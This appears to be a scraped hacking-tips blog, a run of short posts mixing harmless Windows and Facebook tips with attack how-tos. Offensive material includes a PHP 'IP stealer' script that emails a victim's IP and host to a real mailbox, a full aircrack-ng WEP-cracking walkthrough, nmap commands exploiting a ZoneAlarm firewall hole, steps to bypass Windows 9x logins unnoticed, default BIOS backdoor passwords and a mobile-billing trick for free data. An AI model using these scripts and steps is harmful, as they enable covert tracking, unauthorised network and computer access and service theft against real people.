Trick to Disable Send To Option From Right Click Menu

You must have seen Send To option when you right click on any file/folder. This Send To option helps you to send your files/folders from one location (drive) to another. This also acts as a shortcut key to send files to any external storage media (Pen Drive, Memory Card). But by this trick you can also Disable this feature by making changes in window’s Registry settings. Now if someone try to get any data from your computer he/she should have to copy/paste the data rather than to use this Send To option.
Trick to Disable Send To option on Right Click in Context Menu:-

• Type Run in the start up search box and press enter or press Win+R.
• Type Regedit and click OK.
• Now navigate to following location:

HKEY_CLASSES_ROOT\AllFilesystemObjects\shellex\ContextMenuHandlers\Send To

• Double Click on the Default in the right window pane.
• Now there you will see Hexadecimal value written in the Value data field. Remove this code (make it blank) and click OK.

That’s it! Now Send To option will be gone from your context menu when you right click on any file/folder. You can also recover this option back by putting this Hexadecimal value back in the Value data field. So it is better to copy/paste that value somewhere in your computer.

Read More

Facebook FishVille Cheat

So what is FishVille? It’s a game where you raise a fish, feed them and help decorate the tank which they live in. It’s similar to many of the other games like FarmVille, Cafe World, and Roller Coaster Kingdom, however in this one you are simply taking care of a fish tank. As you raise fish you can sell them to earn coins and experience. Honestly, it uses a similar format to all of Zynga’s other games which means the company could reuse a lot of the code from their other games.

Before giving out a tip or two, what is Fishville? Fishville is the latest Facebook game from Zynga! After the smashing success of Farmville, a game where you create and maintain a farm, Zynga has introduced another game which has a lot of potential of being another winner.
Some say that this game is like an underwater Farmville. But in my opinion, this game is more like Tamagochi (remember the small pocket-size gadget kids of the 90s where crazy with??) where you need to make sure you feed your fish every now and then.


In this game you simply grow fish, feed them, and then purchase items for your fish tank. Then come back once in a while to see how your tank is doing. Just like all the other games on Facebook, this one is passive so that you can check in a couple times a day rather than sit and play it non-stop. While I haven’t spent a lot of time playing this game, I’m sure that Zynga is actively tracking user metrics to ensure that this game is just as sticky as their other ones.

Now on to some tips. Like in Farmville, if you do not harvest your crops in time, they will wither and die. The same is true with Fishville. If you do not feed your fish with food, they will die. What you need to be careful of is that you need to know when you need to feed your fish. There are those that takes hours before you need to feed them and there are those that only takes minutes. If you got some fish that needs feeding every few minutes, then you need to be vigilant in feeding them or else they die which happened to me a lot of times.

If it turns out to be a hit (which it probably will be),  Zynga should blow past 200 million monthly active users, far outstripping any of the other competition on the Facebook Platform. If you want to spend your time building a virtual fish tank, go check out FishVille. Also check out Inside Social Games who first broke the news of this application.

Another good tip would be to find neighbors as soon as possible. Like Farmville, you need them to unlock some items. I haven’t fully played Fishville yet but I am sure that your neighbors can help you take care of your fish like how you can take care of your neighbor’s farm in Farmville.

Read More

Bypassing Firewalls

Although firewalls are meant to provide complete protection from port-scan probes and the like, several popular firewall products contain holes just waiting to be exploited. This section focuses on a hole in ZoneAlarm, Versions 2.1.10 to 2.0.26, that allows attackers to port-scan the target system. Specifically, if you system uses port 67 as the source port of a TCP or UDP scan, Zone-Alarm will let the packet through and will not notify you. That means an attacker can TCP or UDP port-scan a ZoneAlarm-protected computer as if there were no firewall, if he or she uses port 67 as the source port on the packets.

For example, in the case of a UDP scan, an attacker can use nmap to port scan the host with the following command line (notice -g67, which specifies the source port):

nmap -g67 -P0 -p130-140 -sU 192.168.128.88

After you have installed a firewall on your system, you may get a number of warnings, seemingly indicating that someone is trying to break into your system. In most cases, however, they are in fact bogus messages that are caused either by your OS or by the process of allocating dynamic IPs. For example, when you dial in to your ISP, you may receive a message that certain IP is probing a particular port on your system. This is because someone disconnected from your ISP just before you dialed in and you were assigned that person's IP address. What you are seeing are the remains of the ISP's communication with the previous user. This is most common when the person to whom the IP was previously assigned was using ICQ or a chat program, was connected to a game server, or had simply turned off his modem before his communication with remote servers was complete. Another common message is that a certain IP is trying to initiate a Net BIOS session on a particular port on your system (in fact, Net BIOS requests to UDP port 137 are among  the most common items you'll see in your  firewall reject logs). This stems from a feature in Windows: When a program resolves an IP address to a name, it may send a NEt BIOS query to an IP address. This process is just part of the background radiation of the Internet and is nothing to be concerned about. Likewise, for a TCP scan, an attacker can use nmap to port-scan the host with the folowing command line (again, notice -g67, specifying source port):

nmap -g67 -P0 -p130-140 -sS 192.168.128.88

(By Dushyant Pandya)

Read More

What are TCP Wrappers?

TCP wrappers enable you to define a set of rules, called access control rules, that define which systems are allowed to access and use the services running on the local machine (that is, the machine on which the TCP wrappers are installed and  configured) and which systems are denied access to these services. In addition, TCP wrappers enable you to log which client is using which service at what time, and even for what purpose. The best thing about TCP wrappers, however, is that they can be used to set booby traps for script kiddies. Before you can understand how TCP wrappers work, however, you must understand how Linux machines respond to connections requests.

All requests for connections received by a Linux box are transferred to the Internet daemon, or the inetd. The inetd is the main daemon on a Linux machine, and it receives all connection requests on behalf of all services or daemons running on all port numbers on that machine.

When the intetd receives a connection request, it uses two configuration files to determine what to do next::

• /etc/services. This file contains the names of the various services on the Linux box and the corresponding port numbers on which these services run. It is used by the inetd to figure out what service runs on what port number.
• /etc/inetd.conf. This file contains the names of the various services on the Linux box and the corresponding daemons or programs providing those services. It is used by inetd to figure out which program or daemon to call on when there is a request for a connection to a particular service.

Both these files work together and are interlinked.

So you can grasp how the inetd uses these two files to allow remote connections to take place, let's use an example. Suppose a client, X, wants to connect to a server, Y. Here's what happens:

1. X sends Y a packets containing the port number to which it wants to connect (in this case, 23, or the telnet port) and other information required to initiate a TCP connection.
2. In response, the inetd at Y searches the /etc/services file for the service name running on port 23(telnet).inetd  them contacts the /etc/inetd.conf file and asks for the name of the daemon or program that runs the telnet service (in this case, in.telnetd).
3. Finally, inetd runs in.telnetd, concluding its role in that particular connection, and starts listening for other connection requests.

This demonstrates that a remote system does not start out by communicating directly with the various daemons, but instead communicates at first only with the inetd.

How, then, can you restrict certain clients from accessing your system while allowing others in? This is where TCP wrappers come in. A TCP wrapper acts as a daemon that resdes between a Linux system's inetd and other programs or daemons on that system, such as in.ftpd, in.telnetd, and so on. Instead of calling programs in a system directly, as in step 3 of the preceding nubered list, inetd calls the TCP wrapper. The wrapper collects the source IP from the packet and accordingly allows or denies the connection, depending on the rules defined in the TCP wrapper. Irrespective of whether the connection is allowed or denied, the wrapper logs the connection request.

Read More

Free Proxy Servers and Hide Your IP

I have collected a lots of url of proxy servers and create a proxy server list.Use any of these to hide your ip address.



http://www.perfectproxy.com/
http://www.primeproxy.com/
http://www.proxyaware.com/
http://www.proxycraze.com/
http://www.proxygasp.com/
http://www.proxyplease.com/
http://www.someproxy.com/
http://www.stupidproxy.com/

http://ipchicken.com



http://www.Stealth-ip.com
http://www.Stealth-ip.org
http://www.Stealth-ip.us
http://www.Stealth-ip.info
http://poxy.us.to/
http://www.BlockFilter.com

http://www.ecoproxy.com/
http://www.coreproxy.com/
http://proxymy.com/
http://www.illegalproxy.com/
http://www.filterfakeout.com/
http://www.privacybrowsing.com/
http://www.w00tage.com/
http://www.aplusproxy.com/
http://www.arandomproxy.com/
http://www.w3privacy.com/

http://argentinaproxy.com
http://hotyogasite.com
http://damaliens.com
http://swagproxy.com
http://cloak-me.info
http://247websurf.com
http://proxify.net
http://salemguide.info
http://your-proxy.org
http://amandas-proxy.info
http://co-i.info
http://w3privacy.com
http://thecrazynetwork.com
http://pajaxy.com
http://mtgtv.com
http://visitriga.info
http://gfun.info
http://surfsizzle.com
http://thecrazycall.com
http://proxify.com

http://www.proxy1.info/
http://www.proxy2info/
http://www.proxy3.info/
http://www.proxy4.info/
http://www.proxy5.info/
http://www.proxy6.info/
http://www.proxy7.info/
http://www.proxy8.info/
http://www.proxy9.info/
http://www.proxy10.info/
http://www.proxy11.info/
http://www.proxy12.info/
http://www.proxy13.info/
http://www.proxy14.info/
http://www.proxy15.info/
http://www.proxy16.info/
http://www.proxy17.info/
http://www.proxy18.info/
http://www.proxy19.info/
http://www.proxy20.info/
http://www.proxyok.com/

http://www.boredatwork.info/
http://www.anonymousurfing.info/
http://www.browsingwork.com/
http://www.freeproxyserver.org/
http://www.browseany.com/
http://www.browsesecurely.com/
http://IEproxy.com/
http://www.sneak3.po.gs/
http://www.proxytastic.com/
http://www.freewebproxy.org/
http://www.thecgiproxy.com/
http://www.hide-me.be/
http://www.anotherproxy.com/
http://www.proxy77.com/
http://www.surf-anon.com/
http://www.free-proxy.info/
http://www.theproxysite.info/
http://www.proxyify.info/
http://www.concealme.com/

http://imsneaky.com
http://lawi.info
http://fieldcollege.info
http://bigredhot.com
http://portugalproxy.com
http://aboutgreatbritain.info
http://surf24h.com
http://xoxy.com
http://proxyparadise.info
http://proxycrib.com
http://unblock.biz
http://newzealandproxy.com
http://your-proxy.info
http://privatproxy.com
http://filterfreesurfing.com
http://allaccessproxy.com
http://hotwinebaskets.com
http://spainwine.info
http://couldfind.info
http://proxy-blog.com
http://serfs.info
http://macaoguide.info
http://proxoid.com
http://rentaustin.info
http://safesurfingweb.com
http://proxyfans.com
http://metnyc.info
http://speedroxi.com
http://ehide.info
http://ipow.info
http://babyboomerco.com
http://proxclub.com
http://anonysurf.nl
http://mylittleproxy.com
http://gz299.com
http://us-proxy.com
http://goinvis.com
http://freeproxy.in
http://onesimpleproxy.com
http://supaproxy.net
http://dedicatedproxy.com
http://india-proxy.com
http://greekdating.info
http://reliableproxy.com
http://dontshowmyip.info

http://proxcool.com
http://prxy.net.ms
http://hidip.info
http://cutmy.info
http://hidelink.ingo
http://xoogie.net
http://oproxy.info
http://stealth-ip.net
http://safeforwork.net
http://vtunnel.com
http://freeproxy.ru/en/free_proxy/cg...
http://proxydrop.com/
http://proxydrop.net/
http://proxydrop.biz/
http://proxydrop.info/
http://proxydrop.org/
http://backfox.com
http://ninjaproxy.com/
http://atunnel.com
http://vpntunnel.net
http://btunnel.com
http://ctunnel.com
http://dtunnel.com
http://proxyhost.org
http://webproxy.dk
http://phproxy.frac.dk
http://phproxy.1go.dk
http://proxify.com
http://home.no.net/roughnex
http://nomorefilter.com
http://rapidwire.net
http://oproxy.info
http://stealth-ip.net
http://cooltunnell.com
http://schoolsurf.com
http://anonymouse.org

http://megaproxy.com/
http://amegaproxy.com/
http://theproxy.be/
http://newproxy.be/
http://projectbypass.com/
http://smartproxy.net/
http://proxy.org/cgi_proxies.shtml
http://hidebehind.net
http://Proxy7.com
http://pcriot.com/
http://tools.rosinstrument.com/cgi-p...
http://www.proxyspider.com/index.php
http://welazy.com/nick
http://reallycoolproxy.com
http://vidznet.com/index.php?pid=3
http://proxyholic.com

http://www.freeproxy.ru/index.htm
http://www.freeproxy.ru/ru/index.htm
http://www.freeproxy.ru/
http://www.freeproxy.info/
http://www.freeproxy.ru/ru/index.htm
http://www.freeproxy.ru/en/programs/
http://www.freeproxy.ru/en/free_proxy/
http://www.freeproxy.ru/en/misc.htm
http://www.freeproxy.ru/en/news.htm
http://www.freeproxy.ru/en/contacts/
http://www.checker.freeproxy.ru/checker/
http://www.freeproxy.ru/shop/
http://www.forum.freeproxy.ru/
http://anonymouse.ws/

please comment below if this post is useful for you..

:)

Read More

Hide EXE File into JPG

Read More

BSNL 3G Hack! Browse Internet For Free

Today I am going to show how to hack BSNL 3G hack and browse unlimited internet at high speed up to 120 Kbps. I am not sure whether this hacking is still working or not, members from other forums are posting that this hack is working fine for them.

Before you start learning how to hack you need to have BSNL 2G SIM and ultimately 3G support mobile phone.

Just follow up the instruction:

1. Recharge your 2G SIM with Rs 1 to convert it to 3G SIM and use them for free hours
2. Check the balance by dialing *123#, the message will show that your GPRS free usage is ZERO MB
3. Now recharge again with Rs 1 to convert in to 2G SIM
4. Now recharge with Rs 274 for unlimited GPRS usage for 2G SIM 
5. Now again recharge with Rs 1 to convert in to 3G SIM 
6. Thats it You have hacked your BSNL 3G for unlimited browsing check the GPRS free usage by dialing *123# it will show 1250000 MB free usage.

Read More

Chat With Command Prompt

If you want a private chat with a friend or client on you Network, you don't need to download any fancy program!
All you need is your friends IP address and Command Prompt.
Firstly, open Notepad and enter:

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

Now save this as "Messenger.bat". Open the .bat file and in Command Prompt you should see:

MESSENGER
User:

After "User" type the IP address of the computer you want to contact.
After this, you should see this:
Message:
Now type in the message you wish to send.
Before you press "Enter" it should look like this:

MESSENGER
User: xx.xxx.xxx.xxx
Message: Hi

Now all you need to do is press "Enter", and start chatting!

Read More

PHP IP Stealer

$ip = $REMOTE_ADDR;
$host = gethostbyaddr($ip);
$date = date("d/m/Y H:i:s");
$email = "dushpandya2001@hotmail.com";
$sujet = "Ip + Host";
$message = "
Ip : $ip
Host : $host";
if(mail($email,$sujet,$message,"Content-Type: text/html")){
echo "Ownneeed";}
else { echo "Shit ?";}
?>

Replace dushpandya2001@hotmail.com with your addres mail make a doc.php give him to your friend and you will recive his ip and host in your inbox..

Read More

Crack a Wi-Fi Network’s WEP Password

Today we're going to run down, step-by-step, how to crack a Wi-Fi network with WEP security turned on. But first, a word: Knowledge is power, but power doesn't mean you should be a jerk, or do anything illegal. Knowing how to pick a lock doesn't make you a thief. Consider this post educational, or a proof-of-concept intellectual exercise.

What You'll Need

Unless you're a computer security and networking ninja, chances are you don't have all the tools on hand to get this job done. Here's what you'll need:

• A compatible wireless adapter—This is the biggest requirement. You'll need a wireless adapter that's capable of packet injection, and chances are the one in your computer is not. After consulting with my friendly neighborhood security expert, I purchased an Alfa AWUS050NH USB adapter,Image Given Below.

• A BackTrack 3 Live CD. Download yourself a copy of the CD and burn it, or load it up in VMware to get started. (I tried the BackTrack 4 pre-release, and it didn't work as well as BT3. Do yourself a favor and stick with BackTrack 3 for now.)

• A nearby WEP-enabled Wi-Fi network. The signal should be strong and ideally people are using it, connecting and disconnecting their devices from it. The more use it gets while you collect the data you need to run your crack, the better your chances of success.

• Patience with the command line. This is an ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient.

Crack That WEP

To crack WEP, you'll need to launch Konsole, BackTrack's built-in command line. It's right there on the taskbar in the lower left corner, second button to the right. Now, the commands.
First run the following to get a list of your network interfaces:

airmon-ng

The only one I've got there is labeled ra0. Yours may be different; take note of the label and write it down. From here on in, substitute it in everywhere a command includes (interface).
Now, run the following four commands.

airmon-ng stop (interface)
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)

Now it's time to pick your network. Run:

airodump-ng (interface)

To see a list of wireless networks around you. When you see the one you want, hit Ctrl+C to stop the list. Highlight the row pertaining to the network of interest, and take note of two things: its BSSID and its channel (in the column labeled CH), as pictured below. Obviously the network you want to crack should have WEP encryption (in the ENC) column, not WPA or anything else.



Now we're going to watch what's going on with that network you chose and capture that information to a file. Run:

airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

Where (channel) is your network's channel, and (bssid) is the BSSID you just copied to clipboard. You can use the Shift+Insert key combination to paste it into the command. Enter anything descriptive for (file name). 


Open a new Konsole window in the foreground, and enter this command:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

Here the ESSID is the access point's SSID name. What you want to get after this command is the reassuring "Association successful" message with that smiley face.

You're almost there. Now it's time for:

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

Here we're creating router traffic to capture more throughput faster to speed up our crack. After a few minutes, that front window will start going crazy with read/write packets.  Here's the part where you might have to grab yourself a cup of coffee or take a walk. Basically you want to wait until enough data has been collected to run your crack.

Depending on the power of your network  this process could take some time. Wait until that #Data goes over 10k, though—because the crack won't work if it doesn't. In fact, you may need more than 10k, though that seems to be a working threshold for many.

Once you've collected enough data, it's the moment of truth. Launch a third Konsole window and run the following to crack that data you've collected:

aircrack-ng -b (bssid) (file name-01.cap)

Here the filename should be whatever you entered above for (file name). You can browse to your Home directory to see it; it's the one with .cap as the extension.
If you didn't get enough data, aircrack will fail and tell you to try again with more.

The WEP key appears next to "KEY FOUND." Drop the colons and enter it to log onto the network.

 

 

Read More

Appear Invisible on Facebook

To start with, once you login to your Facebook account, click on the Friends link on the left panel.
There you will find an option to Edit your friends. Just click on that link. Now, you would be required to create a list just by clicking on Create List. And once you create a list, add as many friends to it as you want.
The reason behind creating this list is that it lets you make yourself invisible to the whole list at once. Now, click on your Facebook chat box. There, you will be able to find that newly created list
Now when you click on that Facebook Chat box, you could find that newly created list. So, you can make yourself invisible to that list by clicking on the green colored button labelled as Go Offline.
This is as simple as that. This is how you can stay invisible on Facebook Chat.

Read More

Multiple Yahoo Messenger in One PC !! :)

For people who manage multiple accounts at the same time (yes I mean you – the one with a separate account for your work stuff, family stuff and naughty stuff), the time has come for you to use ALL your accounts at the same time!


Behold the simplest method that you can use to enable you to log-in simultaneously with your multiple yahoo accounts! See the video I have attached or follow the simple hack that needs 5 steps.

1. Click on Start Menu
2. Click Run
3. Type “regedit” without the quotes, press Enter
4. Navigate to and expand the following in the said order: HKEY_CURRENT_USER/Software/Yahoo/pager/Test
5. Right-click on Test and create a new DWORD value (32 bit).
6. Rename that value as “Plural” without the quotes.
7. Set the value of “Plural” to 1.

Its done!!
Now close registry and restart yahoo messenger and try Multiple Login :)

Read More

SQL Injection Attacks

These attacks occur when the hacker uses specially crafted SQL questions or commands to execute malicious activities on the victim system. This weakness exists when there is no validation of input when a database query is made via the Internet. The worst thing is that SQL attacks, like most other input validation attacks, can be executed easily through a browser. Most Web sites on the Net rely heavily on the safety of their online database information. Naturally, any breath in their security would lead to damage in the form of financial loss, customer dissatisfaction, or possible law suits etc.

Obviously, the first step for a SQL injection attack is to find a vulnerable target. Attackers would be on the alert for online, forms, such as login prompts, search enquiries, guest books, feedback forms, and so on, through which users submit data to the remote system. Another potential target would be any reference to dynamic pages or scripts, like ASP, PHP, CGI, and their like. The following HTML code is a vulnerable target for a SQL injection attack because it lets the user submit information and also refers to an ASP file:
<form action="script/login.asp" method="post" name="LoginForm">
<input value="text" name="username" value="username"></input>
<input value="password"= name="password" value="password"></password>
</form>

Uncovering illegitimate records, bypassing security features and carrying our malicious codes on the remote victim system are all possible for an attacker who has located a vulnerable SQL server. The most common examples, of SQL injection attacks are examined in the following sections. It should always be kept in mind, however, that there are a larger number of such attacks.

Read More

What is an IP address?

Like in the real world, everyone has an individual home address or telephone number to enable easy access. Similarly, all computers connected to the Internet are given a unique Internet Protocol or IP address that can be used to contact that particular computer. In geek language, an IP address is a decimal notation that divides a 32-bit  Internet addresses into four 8-bit fields.

  

Read More

IP Spoofing

IP Spoofing is probably the ultimate trick or attack that an attacker can execute ton the target system. Almost all wannabe computer experts dream of being able to spoof their IP address and fool the target system into establishing illegitimate connections. If successfully executed, IP spoofing is definitely one of the most smooth and classic attacks on the Internet. However, IP spoofing attacks are quite complex and very few attackers have actually been able to spoof their identity successfully. IP Spoofing is a process wherein an attacker fools or tricks the target system into believing that the data packets being sent actually originated on a system other than the real source system. In other words, IP spoofing is a technique that allows an attacker to change or disguise his real identity while communicating with the target system. In this technique, the data packets that the attacker sends to the system will seem to originate at some other arbitrary system.

Read More

Dictionary Attacks(Password Cracking Attack)

Dictionary attacks are an example of a hit and trial password-cracking technique that is commonly used by attackers. In this password-cracking technique, the attacker uses an automatic tool that tries all words that appear in the dictionary as the victim's password. As soon as a particular word matches the victim's password, the automated tool displays it on the screen. In other words, all dictionary words are tried as the password and if a word matches, it is then displayed on the screen as the password of the victim. One of the biggest problems with this type of an attack is that it takes up a lot of system resources and is relatively quite slow. Morever, this password cracking technique is rendered useless if the victim's password is not a word that appears in the dictionary.

Read More

Locking CD-ROM Drives

(For Windows 2000, XP and NT)
      Similar to the above example, it is also possible to lock access to the CD-ROM drive by the following steps:

1. Open the regedit.exe file.
2. Search for the following registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT  \CurrentVersion\Winlogon
3. Create a new string entry named AllocateCDRoms and set its data value to 1 to ensure that only the  local   logged on user can access the CD-ROM drive. On the other hand, if the string entry's    data value is set to 0 then all restrictions are lifted.
4. Exit the Windows registry. You might have to restart the Windows session for the changes to come into effect.

   
         It is also possible to implement the above by simply creating    and executing a file with a .reg extension containing the    undermentioned data:

REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon]
"AllocateCDRoms"="1"

Read More

Distributed DOS Attacks

DOS attacks are not new, in fact they have been aroun for a long time. However, there has been a recent wave of Distributed Denial of services attacks, which pose a great threat to security and are on the verge of overtaking Viruses/Trojans to become  the deadliest threat to Internet security.

In a distributed DOS Attack, a group of say, five hackers join and decide to bring a Fortune 500 company's server down. Now, each one of them breaks into a smaller less-protected network and takes control. So, now they have five networks and supposing there are around 20 systems in each network, it gives these hackers, around 100 systems in all to attack from. They now connect to the network, install a Denial of Service tool on the hacked networks and using these hacked systems launch attacks on the Fortune 500 company. This makes the hackers less easy to detect and helps them do what they wanted to do without getting caught. As they have full control over the smaller less-protected networks, they can easily remove all traces before the authorities get there.

Read More

Hack Windows Login Password

To hack the Windows login password, reboot and wait for the message:
:"Starting Windows 9x..."

When you see this on the screen, press F8. The boot menu will come up. Select option 7, to boot into Dos. Then go to the Windows directory by typing C:/cd windows

Then, rename all files with the extension .pwl by typing the following command:

C:/windows>ren*.pwl*.xyz
or, delete them by typing
C:/windows>del*.pwl*.xyz

Now, when the Windows password login pops up, you can write anything in the place where the password has got to be typed. As you have renamed (or deleted---although renaming then would be better as the victim will not know that his PC has been tempered with) the password files, Windows cannot find that file so when you enter a password, Windows just takes it as the original password.


 

Read More

BIOS Passwords

BIOS passwords are the basic settings on your computer, such as how many and what kinds of disk drives ou have, which ones are enabled and which are disabled and which ones are used for booting. These settings are held in a CMOS chip on the mother board. A tiny battery keeps this chip always running so that whenever  you turn your computer off, it still remembers its instructions.

A common method of entering the BIOS is pressing the Del key at boot up. Other common methods are pressing the keys Ctrl + Alt + Esc or only Ctrol + Esc. Most  computers have a BIOS which can be configured to ask for a password as soon as the computer is switched on. If the Ask Password option is enabled, then as soon as the PC  is switched on, a dialog box welcomes you and asks you for the password. You cannot override this and there is no way of disabling this because to enter the BIOS you need to know the BIOS Password.So, what do you do? Disable it by hacking into the BIOS Setup. But there's a catch. To disable the BIOS password, you need to enter the BIOS. But as soon as you enter the BIOS, the BIOS asks for a password. The most common method of overriding this password prompt is by trying out some default BIOS passwords are:

lkwpeter	AMI	cmos
j262	Award	AMI!SW1
AWARD_SW	bios	AMI?SW1
AWARD_PW	BIOS	password
Biostar	setup	hewittrand

(Note: Complete list of BIOS passwords)

'j262' opens most versions of Award BIOS; it works about 80 percent of the time, 'AWARD_SW' and 'AWARD_PW' work on some computers as well, but less often. In some BIOS, shift + s y x z also works.

The Company name and version of the BIOS  is displayed on the screen each time the system boots.

If the default passwords did not work, then get ready for some serious hacking. Try to reset the BIOS to its default settings so that it asks for no password at all. Do the following:

First, you have to open the computer and then look for a round lithium battery, it probably looks like a silver coin. So, remove the battery and after 30 seconds or so put it back. Some computers may also require you to reset the jumper, so look for a 3-pin jumper and reset it. For example, on most machines you will find a three-pins two and three and leave it there for over five seconds, it will reset the CMOS.

When you boot the machine, some BIOS may give an error saying that the BIOS was reset or tampered with, but that is not such a big problem.

CAUTION: Messing with the CMOS chip and the jumper is more                 dangerous than editing system files.
                So, do everything with utmost caution.

Read More

what is password?

Passwords are one of the oldest forms of authentication mechanism being used on systems accross the world. Password prompts, where one is asked to enter the correct username-password pair, are what prevent infiltration and ensure privacy. Every computer criminal aspires to be able to go past the password prompt and gain illegal access to sensitive data for malicious purposes. Even the data on Windows systems is protected through the password protection mechanism.

      As soon as one boots a Windows system, one is greeted by a welcome password prompt, which on most systems can, unfortunately, be bypassed simply by clicking on the Cancel button. Even after the Windows session has begun, it is possible for a user to enforce password protection on specific files, folders or drives. In other words, passwords have also become on e of the most commonly used authentication mechanisms on systems worldwide. It would be safe to say that passwords are the most important security mechanisms ever deployed.
   
     Unfortunately, most people continue to treat passwords as a set of random and useless characters. It is also becoming increasingly easy for computer criminals to break password protection mechanisms using sophisticated tools and algorithms. Moreover, the most common passwords continue to remain a blank or same as the username. Once an attacker finds out the victim's password there are endless number of malicious activities that can be carried out. Hence, it has become very important for Windows users to take basic precautions to improve the overall security of the system .In this section we discuss some of the most common tips and tricks related to passwords and authentication that every Windows user must know.

Warning: It is always a good idea to back up all system files involved to avoid any accidental damage.

Read More

UDP-flood attack

A UDP-flood attack typically exploits the target system's chargen or echo services to create an infinite loop between two or more UDP services. CERT describes UDP-flood attacks as follows:

When a connection is established between two UDP services, each of which produces output, these two services can produce a very high number of packets that can lead to a denial of service on the machine(s)where the services are offered. Anyone with network connectivity can launch an attack; no account access is needed.

For example, by connecting a host's chargen service to the echo service on the same or another machine, all affected machines may be effectively taken out of service because of the excessively high number of packets produced. In addition, if two or more hosta are so connected, the intervening network may also become congested and deny service to all hosts whose traffice traverses that network.

Countermeasure : To counteract a UDP-flood attack, it's a good idea to disable the chargen and echo services unless and until you really need them. In addition, try to disable as many other UDP services (which are not really important) as possible.

Read More

Smurf Attacks

A smurf attack is a sort of brute-force DOS attack in which a huge number of ping requests containing spoofed source IP addresses from within the target network is sent to a system (normally the router) within that network. When the router gets a ping, or echo request message, it sends an echo reply message to the spoofed IP address, flooding the network with packets, thereby clogging the network and preventing legitimate users from obtaining network services.

Read More

Detecting a SYN-Flood Attack

After the target system has tried to send a SYN/ACK packet to the client, and while it is waiting to receive an ACK packet, the existing connection is said to be half open, or the host is said to be in the SYN_RECEIVED state. If your system is in this state, it may well be experiencing a SYN-flood attack. To determine whether connections on your system are half open, type the netstat command; the parameters passed and the results displayed will vary from system to system. Here's an example:

C:\windows>netstat -a
Active Connections
Proto Local Address Foreign Address State
TCP Dushyant 201.xx.34.23 SYN_RECEIVED
TCP Dushyant 201.xx.34.23 SYN_RECEIVED
TCP Dushyant 201.xx.34.23 SYN_RECEIVED
TCP Dushyant 201.xx.34.23 SYN_RECEIVED
TCP Dushyant 201.xx.34.23 SYN_RECEIVED
TCP Dushyant 201.xx.34.23 SYN_RECEIVED
TCP Dushyant 201.xx.34.23 SYN_RECEIVED
TCP Dushyant *:* ESTABLISHED

In this example, several connections are cited as being in the SYN_RECEIVED state, most likely indicating that this system is under a SYN-flood attack. Note, however, that the preceding output also contains connections cited as being in the ESTABLISHED state; these are legitimate connections, which remain unaffected even after the SYN-flood attack on the target system. 

NOTE :- SYN packets are used in conjunction with half-open connections for stealth port scanning, also called half-open port scanning. For more details, read "Port Scanning

Countermeasure
There is no single countermeasure you can take to protect your system against SYM-flood attacks. There are, however, certain steps you can take to minimize the risk of damage caused by such attacks:

• Reduce the duration of time require for a connection to time out. This will ensure that if numerous spoofed connection requests are sent to the target system, these requests will be discarded more quickly, thus minimizing memory consumption and thereby mitigating the risk of such attacks. Although this will minimize the hogging of system resources, it is not a very good countermeasure against SYN attacks because sometimes even legitimate users might be disconnected by the target system.
• Increase the number of connection requests that can be accepted by the host at one time. One downside to this is that more memory and system resources will be consumed. 
• Install vendor-specific updates and patches. Whenever a new type of attack becomes prevalent on the Internet, each vendor usually comes out with its own version of a countermeasure for its software. For this reason, it is sometimes a good idea to turn to the company whose software you have installed on your system for a countermeasure to a particular type of an attack.
• Use a firewall. They detect SYN attacks, respond with fake replies, and try to trace the spoofed source address to the actual attacker. It is also important to ensure that the firewall has been updated. For more details, read TCP SYN Flooding and IP Spoofing Attacks.

-------------------------------------------------------------------------------------------------------
Next Post   ------>>>   Land Attacks
-------------------------------------------------------------------------------------------------------

Read More

Land Attacks

A land attack is similar to a SYN attack, the only difference  being that instead of including an invalid IP address, the SYN packets include the IP address of the target system itself. More specifically, the source IP address and port number are identical to the destination IP address and port number. As a result, an infinite loop is created within the target system, which ultimately hangs and crashes.

Countermeasure :- The easiest way to protect your system against land attacks is to install a firewall or filtering utility that filters out outgoing packets whose destination IP address is the same as the IP address of the local system.

-------------------------------------------------------------------------------------------------------
Next Post   ------>>>   Smurf Attacks
-------------------------------------------------------------------------------------------------------

Read More

SYN/ACK Packets

To gain a better understanding of SYN and ACK packets, read the following:

• ACK. TCP/IP demands that both the source and destination systems transmit and receive acknowledgement messages to confirm the safe and proper transfer of data. These acknowledgement messages are known as ACK messages or ACK packets. For example, suppose there are two systems, A and B, and that A sends the first (X1) of a series of packets to B. A will not send the second packet in the series (X2) to B until B acknowledges that it received the first packet (ACK X1). If A does not receive an ACK message, then a timed-out occrs, and A will resend the data to B.
• SYN. A SYN packet is noting but a normal TCP packet with the synchronize (SYN) flat switched on. This flat indicates that the sender wants to establish a three-way TCP/IP connection with the destination system.

Read More

SYN-Flood Attacks

This post focuses on one of the most common and easiest to execute DOS attacks, known as SYN flooding. The idea behind SYN flooding is to flood the target system with connection requests from spoofed source addresses. As the target system tries to establish full connections with all these requests, its memory is hogged. As a result, the target system is unable to provide services to legitimate users or clients.

The further clarify, suppose you have a single telephone connection with 10 parallel lines --- that is, 10 lines with the same telephone number. If you use 10 different telephones to simultaneously dial this number, then all 10 parallel lines of the target connection will be used to answer your 10 calls. Even if a legitimate client is trying to call the number (which is under attack by you), he will not be able to get through. SYN flooding is like this, but even better; in the case of SYN flooding, the "calls" are made from a spoof source address, making it difficult (but not impossible) to trace.

How It Works

 SYN flooding works by exploiting the three-way handshake that occurs any time two systems across the network initiate a TCP/IP connection. Here's what happens in a tpical three-way handshake:

1. The source system (client) sends a SYN packet to the destination system (host).
2. The destination system replies with a SYN packet and acknowledges the source system's SYN packet by sending an ACK packet by sending an ACK packet.
3. The source system sends an ACK packet to acknowledge the SYN/ACK packet sent by the host.

 Only when these three steps are completed is a TCP/IP connection established between the  source system and the host.

More about SYN/ACK Packets

